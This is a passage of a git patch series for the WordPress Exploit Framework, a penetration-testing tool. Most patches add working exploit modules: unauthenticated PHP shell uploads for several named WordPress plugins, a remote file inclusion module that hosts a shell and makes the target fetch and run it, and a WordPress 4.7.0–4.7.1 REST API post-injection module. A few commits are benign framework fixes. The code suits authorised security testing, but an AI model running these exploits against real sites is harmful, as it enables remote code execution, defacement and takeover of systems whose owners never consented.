 create mode 100644 modules/exploits/estatik_v2.2.5_shell_upload.rb

diff --git a/modules/exploits/estatik_v2.2.5_shell_upload.rb b/modules/exploits/estatik_v2.2.5_shell_upload.rb
new file mode 100644
index 0000000..bcc7b92
--- /dev/null
+++ b/modules/exploits/estatik_v2.2.5_shell_upload.rb
@@ -0,0 +1,49 @@
+class Wpxf::Exploit::EstatikV225ShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Estatik <= 2.2.5 Unauthenticated Shell Upload',
+      author: [
+        'White Fir Design',               # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8593'],
+        ['URL', 'https://estatik.net/estatik-released-security-updates/']
+      ],
+      date: 'Aug 14 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('estatik', 'readme.txt', '2.3.0')
+  end
+
+  def uploader_url
+    wordpress_url_admin_ajax
+  end
+
+  def payload_body_builder
+    @start_timestamp = Time.now.to_i
+    builder = Utility::BodyBuilder.new
+    builder.add_field('action', 'es_prop_media_images')
+    builder.add_file_from_string('es_media_images[]', payload.encoded, payload_name)
+    builder
+  end
+
+  def expected_upload_response_code
+    500
+  end
+
+  def execute_payload(_payload_url)
+    @end_timestamp = Time.now.to_i
+    base_upload_uri = normalize_uri(wordpress_url_uploads, Time.now.strftime('%Y'), Time.now.strftime('%m'))
+
+    (@start_timestamp..@end_timestamp).each do |timestamp|
+      super(normalize_uri(base_upload_uri, "#{timestamp}_#{payload_name}"))
+    end
+  end
+end

From a6f9f21282b746a64fe7eb32988f6286dbc6ccbf Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Mon, 30 Jan 2017 23:02:57 +0000
Subject: [PATCH 19/48] Add WP Front End Repository Manager shell upload

---
 ...ont_end_repository_manager_shell_upload.rb | 40 +++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 modules/exploits/wp_front_end_repository_manager_shell_upload.rb

diff --git a/modules/exploits/wp_front_end_repository_manager_shell_upload.rb b/modules/exploits/wp_front_end_repository_manager_shell_upload.rb
new file mode 100644
index 0000000..a237b79
--- /dev/null
+++ b/modules/exploits/wp_front_end_repository_manager_shell_upload.rb
@@ -0,0 +1,40 @@
+class Wpxf::Exploit::WpFrontEndRepositoryManagerShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP Front End Repostiory Manager Unauthenticated Shell Upload',
+      author: [
+        'Larry W. Cashdollar',            # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8100'],
+        ['URL', 'http://www.vapid.dhs.org/advisory.php?v=141']
+      ],
+      date: 'Jul 12 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-front-end-repository')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'wp-front-end-repository', 'js', 'uploadify', 'uploadify.php')
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('name', payload_name)
+    builder.add_field('folder', './')
+    builder.add_file_from_string('Filedata', payload.encoded, payload_name)
+    builder
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_plugins, 'wp-front-end-repository', 'js', 'uploadify', payload_name)
+  end
+end

From dee5c5b99d26f4a32809ec44f1032576b1072e2d Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Tue, 31 Jan 2017 00:04:10 +0000
Subject: [PATCH 20/48] Add Fast Image Adder <= 1.1 RFI shell upload

---
 .../fast_image_adder_v1.1_rfi_shell_upload.rb | 89 +++++++++++++++++++
 1 file changed, 89 insertions(+)
 create mode 100644 modules/exploits/fast_image_adder_v1.1_rfi_shell_upload.rb

diff --git a/modules/exploits/fast_image_adder_v1.1_rfi_shell_upload.rb b/modules/exploits/fast_image_adder_v1.1_rfi_shell_upload.rb
new file mode 100644
index 0000000..ca8441e
--- /dev/null
+++ b/modules/exploits/fast_image_adder_v1.1_rfi_shell_upload.rb
@@ -0,0 +1,89 @@
+require 'erb'
+
+class Wpxf::Exploit::FastImageAdderV11RfiShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpServer
+  include Wpxf::WordPress::ShellUpload
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Fast Image Adder <= 1.1 RFI Shell Upload',
+      desc: %(
+        Fast Image Adder <= 1.1 suffers from a remote file inclusion vulnerability
+        which allows unauthenticated users to download and execute a PHP shell
+        hosted on a remote server.
+
+        This module will host a HTTP server to serve the payload, and make a request
+        to the target that will initiate the download and execution of the payload.
+      ),
+      author: [
+        'Larry W. Cashdollar',            # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8092'],
+        ['URL', 'http://www.vapid.dhs.org/advisory.php?v=139']
+      ],
+      date: 'Jul 10 2015'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'rfi_host',
+        desc: 'The address of the host listening for a connection',
+        required: true
+      ),
+      StringOption.new(
+        name: 'rfi_path',
+        desc: 'The path to access via the remote file inclusion request',
+        default: Utility::Text.rand_alpha(8),
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('fast-image-adder', '1.2')
+  end
+
+  def rfi_host
+    normalized_option_value('rfi_host')
+  end
+
+  def rfi_path
+    normalized_option_value('rfi_path')
+  end
+
+  def rfi_url
+    "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}"
+  end
+
+  def on_http_request(_path, _params, _headers)
+    payload.encoded
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'fast-image-adder', "fast-image-adder-uploader.php?confirm=url&url=#{url_encode(rfi_url)}")
+  end
+
+  def uploaded_payload_location
+    upload_result.body[/Uploaded as (.+?)\s/i, 1]
+  end
+
+  def payload_body_builder
+    Utility::BodyBuilder.new
+  end
+
+  def execute_payload(url)
+    stop_http_server
+    super(url)
+  end
+
+  def run
+    start_http_server true
+    super
+  end
+end

From 2b0992a926eab48fb95b7c7b7995992247517e21 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Tue, 31 Jan 2017 23:28:13 +0000
Subject: [PATCH 21/48] Update README

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index c8c2e8e..da4c7aa 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
 # wordpress-exploit-framework
-[![Build Status](https://travis-ci.org/rastating/wordpress-exploit-framework.svg?branch=master)](https://travis-ci.org/rastating/wordpress-exploit-framework) [![Code Climate](https://codeclimate.com/github/rastating/wordpress-exploit-framework/badges/gpa.svg)](https://codeclimate.com/github/rastating/wordpress-exploit-framework) [![Dependency Status](https://gemnasium.com/rastating/wordpress-exploit-framework.svg)](https://gemnasium.com/rastating/wordpress-exploit-framework)
+[![Build Status](https://img.shields.io/travis/rastating/wordpress-exploit-framework/master.svg?colorB=007ec6)](https://travis-ci.org/rastating/wordpress-exploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rastating/wordpress-exploit-framework.svg?colorB=007ec6)](https://codeclimate.com/github/rastating/wordpress-exploit-framework) [![Dependency Status](https://img.shields.io/gemnasium/rastating/wordpress-exploit-framework.svg?colorB=007ec6)](https://gemnasium.com/rastating/wordpress-exploit-framework) [![GitHub release](https://img.shields.io/github/release/rastating/wordpress-exploit-framework.svg)](https://github.com/rastating/wordpress-exploit-framework/releases/latest) [![License](https://img.shields.io/badge/license-GPL%20v3-blue.svg)](https://github.com/rastating/wordpress-exploit-framework/blob/master/LICENSE)
 
 A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
 

From 1346d1ec9bd5c78734bffb3dba0c3831816f18f1 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Tue, 31 Jan 2017 23:38:33 +0000
Subject: [PATCH 22/48] Update README

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index da4c7aa..a59f451 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,5 @@
 # wordpress-exploit-framework
-[![Build Status](https://img.shields.io/travis/rastating/wordpress-exploit-framework/master.svg?colorB=007ec6)](https://travis-ci.org/rastating/wordpress-exploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rastating/wordpress-exploit-framework.svg?colorB=007ec6)](https://codeclimate.com/github/rastating/wordpress-exploit-framework) [![Dependency Status](https://img.shields.io/gemnasium/rastating/wordpress-exploit-framework.svg?colorB=007ec6)](https://gemnasium.com/rastating/wordpress-exploit-framework) [![GitHub release](https://img.shields.io/github/release/rastating/wordpress-exploit-framework.svg)](https://github.com/rastating/wordpress-exploit-framework/releases/latest) [![License](https://img.shields.io/badge/license-GPL%20v3-blue.svg)](https://github.com/rastating/wordpress-exploit-framework/blob/master/LICENSE)
+[![Build Status](https://img.shields.io/travis/rastating/wordpress-exploit-framework/master.svg?colorB=007ec6)](https://travis-ci.org/rastating/wordpress-exploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rastating/wordpress-exploit-framework.svg?colorB=007ec6)](https://codeclimate.com/github/rastating/wordpress-exploit-framework) [![Dependency Status](https://img.shields.io/gemnasium/rastating/wordpress-exploit-framework.svg?colorB=007ec6)](https://gemnasium.com/rastating/wordpress-exploit-framework) [![GitHub release](https://img.shields.io/github/release/rastating/wordpress-exploit-framework.svg)](https://github.com/rastating/wordpress-exploit-framework/releases/latest) [![License](https://img.shields.io/badge/license-GPL%20v3-blue.svg)](https://github.com/rastating/wordpress-exploit-framework/blob/master/LICENSE) [![Trello](https://img.shields.io/badge/trello-wordpress--exploit--framework-blue.svg)](https://trello.com/b/XuChenHg)
 
 A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
 

From 1ad04d434003c5947b3d13da013c0fb4d44fe28a Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Wed, 1 Feb 2017 23:44:22 +0000
Subject: [PATCH 23/48] Expand payload path on access

---
 payloads/custom.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payloads/custom.rb b/payloads/custom.rb
index 1833c5a..2007bf5 100644
--- a/payloads/custom.rb
+++ b/payloads/custom.rb
@@ -21,7 +21,7 @@ def encoded
     end
 
     def raw
-      File.open(datastore['payload_path'], 'rb', &:read)
+      File.open(File.expand_path(datastore['payload_path']), 'rb', &:read)
     end
   end
 end

From d5b49025ef3b5844cfd33d454c8fd5a08214cc21 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Thu, 2 Feb 2017 23:37:45 +0000
Subject: [PATCH 24/48] Add method to retrieve the REST API URL

---
 lib/wpxf/wordpress/urls.rb  | 5 +++++
 spec/wordpress/urls_spec.rb | 7 +++++++
 2 files changed, 12 insertions(+)

diff --git a/lib/wpxf/wordpress/urls.rb b/lib/wpxf/wordpress/urls.rb
index fb6913c..72f7f83 100644
--- a/lib/wpxf/wordpress/urls.rb
+++ b/lib/wpxf/wordpress/urls.rb
@@ -111,4 +111,9 @@ def wordpress_url_uploads
   def wordpress_url_admin_profile
     normalize_uri(wordpress_url_admin, 'profile.php')
   end
+
+  # @return [String] the base path of the REST API introduced in WordPress 4.7.0.
+  def wordpress_url_rest_api
+    normalize_uri(full_uri, 'wp-json')
+  end
 end
diff --git a/spec/wordpress/urls_spec.rb b/spec/wordpress/urls_spec.rb
index 1f21bbd..ae3388c 100644
--- a/spec/wordpress/urls_spec.rb
+++ b/spec/wordpress/urls_spec.rb
@@ -165,4 +165,11 @@
       expect(subject.wordpress_url_admin_profile).to eq url
     end
   end
+
+  describe '#wordpress_url_rest_api' do
+    it 'returns the REST API base path' do
+      url = 'http://127.0.0.1/wp/wp-json'
+      expect(subject.wordpress_url_rest_api).to eq url
+    end
+  end
 end

From 590b18cf948fa3016d2555eec46665f22afe7e09 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Fri, 3 Feb 2017 00:12:53 +0000
Subject: [PATCH 25/48] Add WordPress 4.7.0 - 4.7.1 content injection module

---
 .../auxiliary/wp_v4.7.1_content_injection.rb  | 105 ++++++++++++++++++
 1 file changed, 105 insertions(+)
 create mode 100644 modules/auxiliary/wp_v4.7.1_content_injection.rb

diff --git a/modules/auxiliary/wp_v4.7.1_content_injection.rb b/modules/auxiliary/wp_v4.7.1_content_injection.rb
new file mode 100644
index 0000000..615283a
--- /dev/null
+++ b/modules/auxiliary/wp_v4.7.1_content_injection.rb
@@ -0,0 +1,105 @@
+class Wpxf::Auxiliary::WpV471ContentInjection < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WordPress 4.7.0 - 4.7.1 Unauthenticated Content Injection',
+      desc: %(
+        The REST API in versions 4.7.0 and 4.7.1 of WordPress contain a number
+        of validation issues, which allow unauthenticated users to edit any post
+        on the target installation.
+
+        If the target has the API enabled (enabled by default), this module will
+        update the post with the specified content, title and or excerpt.
+      ),
+      author: [
+        'Sucuri <sucuri.net>',            # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8734'],
+        ['URL', 'https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html']
+      ],
+      date: 'Feb 01 2017'
+    )
+
+    register_options([
+      IntegerOption.new(
+        name: 'post_id',
+        desc: 'The ID of the post to update',
+        required: true
+      ),
+      StringOption.new(
+        name: 'content',
+        desc: 'The content to inject',
+        required: false
+      ),
+      StringOption.new(
+        name: 'title',
+        desc: 'The title to inject',
+        required: false
+      ),
+      StringOption.new(
+        name: 'excerpt',
+        desc: 'The excerpt to inject',
+        required: false
+      )
+    ])
+  end
+
+  def check
+    version = wordpress_version
+    return :unknown if version.nil?
+
+    if version == Gem::Version.new('4.7') || version == Gem::Version.new('4.7.1')
+      return :vulnerable if rest_api_is_available
+    end
+
+    :safe
+  end
+
+  def rest_api_is_available
+    res = execute_get_request(url: wordpress_url_rest_api)
+    (res && res.code == 200)
+  end
+
+  def post_id
+    normalized_option_value('post_id')
+  end
+
+  def post_route
+    normalize_uri(wordpress_url_rest_api, 'wp', 'v2', 'posts', post_id)
+  end
+
+  def api_request_body
+    data = {}
+    data['content'] = datastore['content'] if datastore['content']
+    data['title'] = datastore['title'] if datastore['title']
+    data['excerpt'] = datastore['excerpt'] if datastore['excerpt']
+    data
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Building request...'
+    data = api_request_body
+    emit_info "Request: #{data.inspect}", true
+
+    emit_info 'Injecting content...'
+    execute_put_request(
+      url: post_route,
+      body: data.to_json,
+      params: {
+        'id' => "#{post_id}#{Utility::Text.rand_alpha(3)}"
+      },
+      headers: {
+        'Content-Type' => 'application/json'
+      }
+    )
+
+    true
+  end
+end

From f051ba8bf8207ade3b0a5e39f7ac668a5e9a24d3 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Fri, 3 Feb 2017 22:38:47 +0000
Subject: [PATCH 26/48] Add #upload_request_params

---
 lib/wpxf/wordpress/shell_upload.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/wpxf/wordpress/shell_upload.rb b/lib/wpxf/wordpress/shell_upload.rb
index 878da5a..3885c6b 100644
--- a/lib/wpxf/wordpress/shell_upload.rb
+++ b/lib/wpxf/wordpress/shell_upload.rb
@@ -60,6 +60,11 @@ def expected_upload_response_code
     200
   end
 
+  # @return [Hash] the query string parameters to use when submitting the upload request.
+  def upload_request_params
+    nil
+  end
+
   # Run the module.
   # @return [Boolean] true if successful.
   def run
@@ -98,7 +103,7 @@ def payload_name_length
 
   def upload_payload(builder)
     builder.create do |body|
-      @upload_result = execute_post_request(url: uploader_url, body: body, cookie: @session_cookie)
+      @upload_result = execute_post_request(url: uploader_url, params: upload_request_params, body: body, cookie: @session_cookie)
     end
 
     if @upload_result.nil? || @upload_result.timed_out?

From 99ed86baf83f941023cd2115eef303350b5cbd27 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Fri, 3 Feb 2017 22:40:45 +0000
Subject: [PATCH 27/48] Add MailCWP <= 1.99 unauthenticated shell upload

---
 .../mailcwp_unauthenticated_shell_upload.rb   | 49 +++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 modules/exploits/mailcwp_unauthenticated_shell_upload.rb

diff --git a/modules/exploits/mailcwp_unauthenticated_shell_upload.rb b/modules/exploits/mailcwp_unauthenticated_shell_upload.rb
new file mode 100644
index 0000000..d158fed
--- /dev/null
+++ b/modules/exploits/mailcwp_unauthenticated_shell_upload.rb
@@ -0,0 +1,49 @@
+class Wpxf::Exploit::MailcwpUnauthenticatedShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'MailCWP <= v1.99 Unauthenticated Shell Upload',
+      author: [
+        'Larry W. Cashdollar',            # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8090'],
+        ['URL', 'http://www.vapid.dhs.org/advisory.php?v=138']
+      ],
+      date: 'Jul 09 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('mailcwp', '1.100')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'mailcwp', 'mailcwp-upload.php')
+  end
+
+  def message_id
+    @message_id ||= Utility::Text.rand_numeric(3)
+  end
+
+  def upload_request_params
+    {
+      message_id: message_id,
+      upload_dir: '../../uploads'
+    }
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('file', payload.encoded, payload_name)
+    builder
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, "#{message_id}-#{payload_name}")
+  end
+end

From 513a1f563a112825d4cb0affbb1be1e7e9602e27 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 4 Feb 2017 00:12:01 +0000
Subject: [PATCH 28/48] Add ability to specify the file extension to use for
 the payload

---
 lib/wpxf/wordpress/shell_upload.rb | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/wpxf/wordpress/shell_upload.rb b/lib/wpxf/wordpress/shell_upload.rb
index 3885c6b..571b170 100644
--- a/lib/wpxf/wordpress/shell_upload.rb
+++ b/lib/wpxf/wordpress/shell_upload.rb
@@ -65,6 +65,11 @@ def upload_request_params
     nil
   end
 
+  # @return [String] the extension type to use when generating the payload name.
+  def payload_name_extension
+    'php'
+  end
+
   # Run the module.
   # @return [Boolean] true if successful.
   def run
@@ -72,7 +77,7 @@ def run
     return false unless before_upload
 
     emit_info 'Preparing payload...'
-    @payload_name = "#{Utility::Text.rand_alpha(payload_name_length)}.php"
+    @payload_name = "#{Utility::Text.rand_alpha(payload_name_length)}.#{payload_name_extension}"
     builder = payload_body_builder
     return false unless builder
 

From 02dc54ea9703871f474b794590f67d7855614d49 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 4 Feb 2017 00:12:53 +0000
Subject: [PATCH 29/48] Add MailCWP v1.100 authenticated shell upload

---
 .../mailcwp_authenticated_shell_upload.rb     | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 modules/exploits/mailcwp_authenticated_shell_upload.rb

diff --git a/modules/exploits/mailcwp_authenticated_shell_upload.rb b/modules/exploits/mailcwp_authenticated_shell_upload.rb
new file mode 100644
index 0000000..12967e6
--- /dev/null
+++ b/modules/exploits/mailcwp_authenticated_shell_upload.rb
@@ -0,0 +1,33 @@
+require_relative './mailcwp_unauthenticated_shell_upload'
+
+class Wpxf::Exploit::MailcwpAuthenticatedShellUpload < Wpxf::Exploit::MailcwpUnauthenticatedShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'MailCWP v1.100 Authenticated Shell Upload',
+      author: [
+        'Larry W. Cashdollar',            # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8090'],
+        ['CVE', '2016-1000156'],
+        ['URL', 'http://www.vapidlabs.com/advisory.php?v=175']
+      ],
+      date: 'Nov 01 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('mailcwp', '1.101')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def payload_name_extension
+    'phtml'
+  end
+end

From 27afb8232af6d0e13f7bfda2df169614e43901e6 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 4 Feb 2017 14:00:10 +0000
Subject: [PATCH 30/48] Reduce size of bind_to_address option description

---
 payloads/reverse_tcp.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/payloads/reverse_tcp.rb b/payloads/reverse_tcp.rb
index 1cf9508..cde7c98 100644
--- a/payloads/reverse_tcp.rb
+++ b/payloads/reverse_tcp.rb
@@ -43,8 +43,7 @@ def initialize
           name: 'bind_to_address',
           default: '0.0.0.0',
           required: true,
-          desc: 'The address to bind to when using WPXF to listen for '\
-                'incoming connections'
+          desc: 'The address to bind to when listening for connections'
         )
       ])
     end

From 11ea6908b84e2a2f5d5ea6d0a51d616678ab31e0 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 4 Feb 2017 14:00:37 +0000
Subject: [PATCH 31/48] Add ACF Frontend Display <= v2.0.5 unauthenticated
 shell upload

---
 .../acf_frontend_display_shell_upload.rb      | 39 +++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 modules/exploits/acf_frontend_display_shell_upload.rb

diff --git a/modules/exploits/acf_frontend_display_shell_upload.rb b/modules/exploits/acf_frontend_display_shell_upload.rb
new file mode 100644
index 0000000..50dd04b
--- /dev/null
+++ b/modules/exploits/acf_frontend_display_shell_upload.rb
@@ -0,0 +1,39 @@
+class Wpxf::Exploit::AcfFrontendDisplayShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'ACF Frontend Display <= 2.0.5 Unauthenticated Shell Upload',
+      author: [
+        'TCYB3R',                         # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8086'],
+        ['EDB', '37514']
+      ],
+      date: 'Jul 03 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('acf-frontend-display', '2.0.6')
+  end
+
+  def uploader_url
+    normalize_uri(wordpress_url_plugins, 'acf-frontend-display', 'js', 'blueimp-jQuery-File-Upload-d45deb1', 'server', 'php', 'index.php')
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('action', 'upload')
+    builder.add_file_from_string('files', payload.encoded, payload_name)
+    builder
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, "uigen_#{Time.now.strftime('%Y')}", payload_name)
+  end
+end

From a396dec339d49752a29b96a9dbe480f062ab3557 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 4 Feb 2017 14:26:55 +0000
Subject: [PATCH 32/48] Simplify pattern and stop non-numeric characters being
 returned

---
 lib/wpxf/wordpress/fingerprint.rb  | 2 +-
 spec/wordpress/fingerprint_spec.rb | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/wpxf/wordpress/fingerprint.rb b/lib/wpxf/wordpress/fingerprint.rb
index 894f0f0..1783419 100644
--- a/lib/wpxf/wordpress/fingerprint.rb
+++ b/lib/wpxf/wordpress/fingerprint.rb
@@ -79,7 +79,7 @@ def check_version_from_custom_file(url, regex, fixed = nil, introduced = nil)
 
   private
 
-  WORDPRESS_VERSION_PATTERN = '([^\r\n"\']+\.[^\r\n"\']+)'
+  WORDPRESS_VERSION_PATTERN = '(\d+\.\d+(?:\.\d+)*)'
 
   WORDPRESS_GENERATOR_VERSION_PATTERN = %r{<meta\sname="generator"\s
     content="WordPress\s#{WORDPRESS_VERSION_PATTERN}"\s\/>}xi
diff --git a/spec/wordpress/fingerprint_spec.rb b/spec/wordpress/fingerprint_spec.rb
index 9b8d392..c8f6225 100644
--- a/spec/wordpress/fingerprint_spec.rb
+++ b/spec/wordpress/fingerprint_spec.rb
@@ -36,11 +36,11 @@
 
   describe '#wordpress_version' do
     let(:body) do
-      '<meta name="generator" content="WordPress 4.0" />'
+      '<meta name="generator" content="WordPress 4.7.1" />'
     end
 
     it 'returns the WordPress version number' do
-      expect(subject.wordpress_version).to eq Gem::Version.new('4.0')
+      expect(subject.wordpress_version).to eq Gem::Version.new('4.7.1')
     end
   end
 

From d1f34afc25f8b281b1e7dce430fb1b11afad5bdb Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sat, 4 Feb 2017 15:38:03 +0000
Subject: [PATCH 33/48] Prevent null reference if escape characters such as ^D
 are used

Fixes #35
---
 lib/cli/console.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/cli/console.rb b/lib/cli/console.rb
index 5457ab5..8e7dc88 100644
--- a/lib/cli/console.rb
+++ b/lib/cli/console.rb
@@ -64,7 +64,10 @@ def prompt_for_input
 
       prompt += " [#{context.module_path}]" if context
       prompt += ' > '
-      Readline.readline(prompt, true)
+
+      input = Readline.readline(prompt, true).to_s
+      puts if input.empty?
+      input
     end
 
     def can_handle?(command)

From a19d81209b94ce7017ce2dcb1975e29ae771f740 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 5 Feb 2017 01:13:07 +0000
Subject: [PATCH 34/48] Add Ultimate Product Catalogue <= v3.1.1
 unauthenticated shell upload

---
 ...ultimate_product_catalogue_shell_upload.rb | 45 +++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 modules/exploits/ultimate_product_catalogue_shell_upload.rb

diff --git a/modules/exploits/ultimate_product_catalogue_shell_upload.rb b/modules/exploits/ultimate_product_catalogue_shell_upload.rb
new file mode 100644
index 0000000..1795fd7
--- /dev/null
+++ b/modules/exploits/ultimate_product_catalogue_shell_upload.rb
@@ -0,0 +1,45 @@
+class Wpxf::Exploit::UltimateProductCatalogueShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Ultimate Product Catalogue <= v3.1.1 Unauthenticated Shell Upload',
+      author: [
+        'LUCA ERCOLI ',                   # Discovery and disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '7939'],
+        ['URL', 'https://blog.seeweb.it/wordpress-ultimate-product-catalogue-vulnerability/']
+      ],
+      date: 'Apr 22 2015'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('ultimate-product-catalogue', 'readme.txt', '3.1.2')
+  end
+
+  def uploader_url
+    wordpress_url_admin_ajax
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('Products_Spreadsheet', payload.encoded, payload_name)
+    builder
+  end
+
+  def upload_request_params
+    {
+      'action' => 'widgets_init',
+      'Action' => 'UPCP_AddProductSpreadsheet'
+    }
+  end
+
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_plugins, 'ultimate-product-catalogue', 'product-sheets', payload_name)
+  end
+end

From 16cd664ae172d361fa9df5f07eeb605647fec6f4 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 5 Feb 2017 12:36:22 +0000
Subject: [PATCH 35/48] Add ability to display module descriptions
 pre-formatted

---
 lib/cli/module_info.rb       | 6 +++++-
 lib/cli/output.rb            | 4 ++++
 lib/wpxf/core/module_info.rb | 7 ++++++-
 3 files changed, 15 insertions(+), 2 deletions(-)

diff --git a/lib/cli/module_info.rb b/lib/cli/module_info.rb
index 1eddc09..30eb3bd 100644
--- a/lib/cli/module_info.rb
+++ b/lib/cli/module_info.rb
@@ -13,7 +13,11 @@ def print_author
     def print_description
       print_std('Description:')
       indent_cursor do
-        print_std(wrap_text(context.module.module_desc))
+        if context.module.module_description_preformatted
+          print_std(indent_without_wrap(context.module.module_desc))
+        else
+          print_std(wrap_text(context.module.module_desc))
+        end
       end
     end
 
diff --git a/lib/cli/output.rb b/lib/cli/output.rb
index 26645c3..02f297b 100644
--- a/lib/cli/output.rb
+++ b/lib/cli/output.rb
@@ -12,6 +12,10 @@ def wrap_text(s, padding = 0, width = 78)
        .gsub(/\s+$/, '')
     end
 
+    def indent_without_wrap(s)
+      s.gsub(/\n/, "\n#{@indent * @indent_level}")
+    end
+
     def print_std(msg)
       puts "#{@indent * @indent_level}#{msg}"
     end
diff --git a/lib/wpxf/core/module_info.rb b/lib/wpxf/core/module_info.rb
index 703db5a..7967b9a 100644
--- a/lib/wpxf/core/module_info.rb
+++ b/lib/wpxf/core/module_info.rb
@@ -17,7 +17,7 @@ def update_info(info)
 
       @info.merge!(info)
       @info[:date] = Date.parse(@info[:date].to_s)
-      @info[:desc] = @info[:desc].split.join(' ')
+      @info[:desc] = @info[:desc].gsub(/  +/, ' ')
       @info
     end
 
@@ -45,5 +45,10 @@ def module_author
     def module_date
       @info[:date]
     end
+
+    # @return [Boolean] true if the description is preformatted.
+    def module_description_preformatted
+      @info[:desc_preformatted]
+    end
   end
 end

From 3641d7ec04a0126f7722e9e3a16624351b833ae7 Mon Sep 17 00:00:00 2001
From: Rob <rob@rastating.com>
Date: Sun, 5 Feb 2017 12:36:50 +0000
